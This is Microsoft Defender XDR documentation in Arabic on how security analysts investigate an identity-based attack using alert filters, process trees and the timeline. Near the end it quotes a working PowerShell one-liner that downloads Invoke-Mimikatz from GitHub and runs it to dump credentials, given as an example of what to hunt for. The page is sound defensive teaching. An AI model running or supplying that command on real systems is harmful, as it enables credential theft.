مثال على هجوم يستند إلى الهوية
ينطبق على:
- Microsoft Defender XDR
يمكن أن تساعد Microsoft Defender for Identity في اكتشاف المحاولات الضارة لاختراق الهويات في مؤسستك. نظرا لأن Defender for Identity يتكامل مع Microsoft Defender XDR، يمكن لمحللي الأمان رؤية التهديدات الواردة من Defender for Identity، مثل محاولات رفع امتيازات Netlogon المشتبه فيها.
تحليل الهجوم في Microsoft Defender for Identity
يسمح Microsoft Defender XDR للمحللين بتصفية التنبيهات حسب مصدر الكشف في علامة التبويب Alerts في صفحة الحوادث. في المثال التالي، تتم تصفية مصدر الكشف إلى Defender for Identity.
ينتقل تحديد تنبيه هجوم التجزئة المشتبه به إلى صفحة في Microsoft Defender for Cloud Apps تعرض معلومات أكثر تفصيلا. يمكنك دائما معرفة المزيد حول تنبيه أو هجوم عن طريق تحديد معرفة المزيد حول نوع التنبيه هذا لقراءة وصف للهجوم واقتراحات المعالجة.
التحقيق في نفس الهجوم في Microsoft Defender لنقطة النهاية
بدلا من ذلك، يمكن للمحلل استخدام Defender لنقطة النهاية لمعرفة المزيد حول النشاط على نقطة نهاية. حدد الحدث من قائمة انتظار الحدث، ثم حدد علامة التبويب Alerts . من هنا، يمكنهم تحديد مصدر الكشف أيضا. يمثل مصدر الكشف المسمى EDR الكشف عن نقطة النهاية والاستجابة لها، وهو Defender لنقطة النهاية. من هنا، يحدد المحلل تنبيها تم اكتشافه بواسطة EDR.
تعرض صفحة التنبيه معلومات مختلفة ذات صلة مثل اسم الجهاز المتأثر واسم المستخدم وحالة التحقيق التلقائي وتفاصيل التنبيه. تصور قصة التنبيه تمثيلا مرئيا لشجرة العملية. شجرة العملية هي تمثيل هرمي للعمليات الأصلية والتابعة المتعلقة بالتنبيه.
يمكن توسيع كل عملية لعرض مزيد من التفاصيل. التفاصيل التي يمكن للمحلل رؤيتها هي الأوامر الفعلية التي تم إدخالها كجزء من برنامج نصي ضار وعناوين IP للاتصال الصادر ومعلومات مفيدة أخرى.
من خلال تحديد See in timeline، يمكن للمحلل التنقل لأسفل بشكل أكبر لتحديد الوقت الدقيق للتسوية.
يمكن Microsoft Defender لنقطة النهاية الكشف عن العديد من الملفات والبرامج النصية الضارة. ومع ذلك، نظرا للعديد من الاستخدامات المشروعة للاتصالات الصادرة وPowerShell ونشاط سطر الأوامر، قد يعتبر بعض النشاط حميدا حتى يقوم بإنشاء ملف أو نشاط ضار. لذلك، يساعد استخدام المخطط الزمني المحللين على وضع التنبيه في السياق مع النشاط المحيط لتحديد المصدر أو الوقت الأصلي للهجوم الذي يتم حجبه بخلاف ذلك بواسطة نظام الملفات الشائع ونشاط المستخدم.
لاستخدام المخطط الزمني، سيبدأ المحلل في وقت الكشف عن التنبيه (باللون الأحمر) والتمرير لأسفل في الوقت المناسب لتحديد وقت بدء النشاط الأصلي الذي أدى إلى النشاط الضار بالفعل.
من المهم فهم النشاط الشائع وتمييزه مثل الاتصالات Windows Update وحركة مرور تنشيط البرامج الموثوق بها ل Windows والاتصالات الشائعة الأخرى بمواقع Microsoft ونشاط الإنترنت التابع لجهة خارجية ونشاط microsoft Endpoint Configuration Manager والنشاط غير الحميد الآخر من النشاط المشبوه. تتمثل إحدى طرق التمييز في استخدام عوامل تصفية المخطط الزمني. هناك العديد من عوامل التصفية التي يمكنها تمييز نشاط معين أثناء تصفية أي شيء لا يريد المحلل عرضه.
في الصورة أدناه، تمت تصفية المحلل لعرض أحداث الشبكة ومعالجتها فقط. تسمح معايير التصفية هذه للمحلل برؤية اتصالات الشبكة والعمليات المحيطة بالحدث حيث أنشأت المفكرة اتصالا بعنوان IP، والذي رأيناه أيضا في شجرة العملية.
في هذا الحدث المحدد، تم استخدام المفكرة لإجراء اتصال صادر ضار. ومع ذلك، غالبا ما يستخدم المهاجمون iexplorer.exe لإنشاء اتصالات لتنزيل حمولة ضارة لأن عمليات iexplorer.exe عادة ما تعتبر نشاطا منتظما لمستعرض الويب.
عنصر آخر للبحث عنه في المخطط الزمني هو استخدامات PowerShell للاتصالات الصادرة. سيبحث المحلل عن اتصالات PowerShell الناجحة بأوامر مثل IEX (New-Object Net.Webclient) متبوعة باتصال صادر بموقع ويب يستضيف ملفا ضارا.
في المثال التالي، تم استخدام PowerShell لتنزيل Mimikatz وتنفيذه من موقع ويب:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
يمكن للمحلل البحث بسرعة عن الكلمات الأساسية عن طريق الكتابة في الكلمة الأساسية في شريط البحث لعرض الأحداث التي تم إنشاؤها باستخدام PowerShell فقط.
الخطوة التالية
راجع مسار التحقيق في التصيد الاحتيالي .
راجع أيضًا
تلميح
هل تريد معرفة المزيد؟ تفاعل مع مجتمع أمان Microsoft في مجتمعنا التقني: Microsoft Defender XDR Tech Community.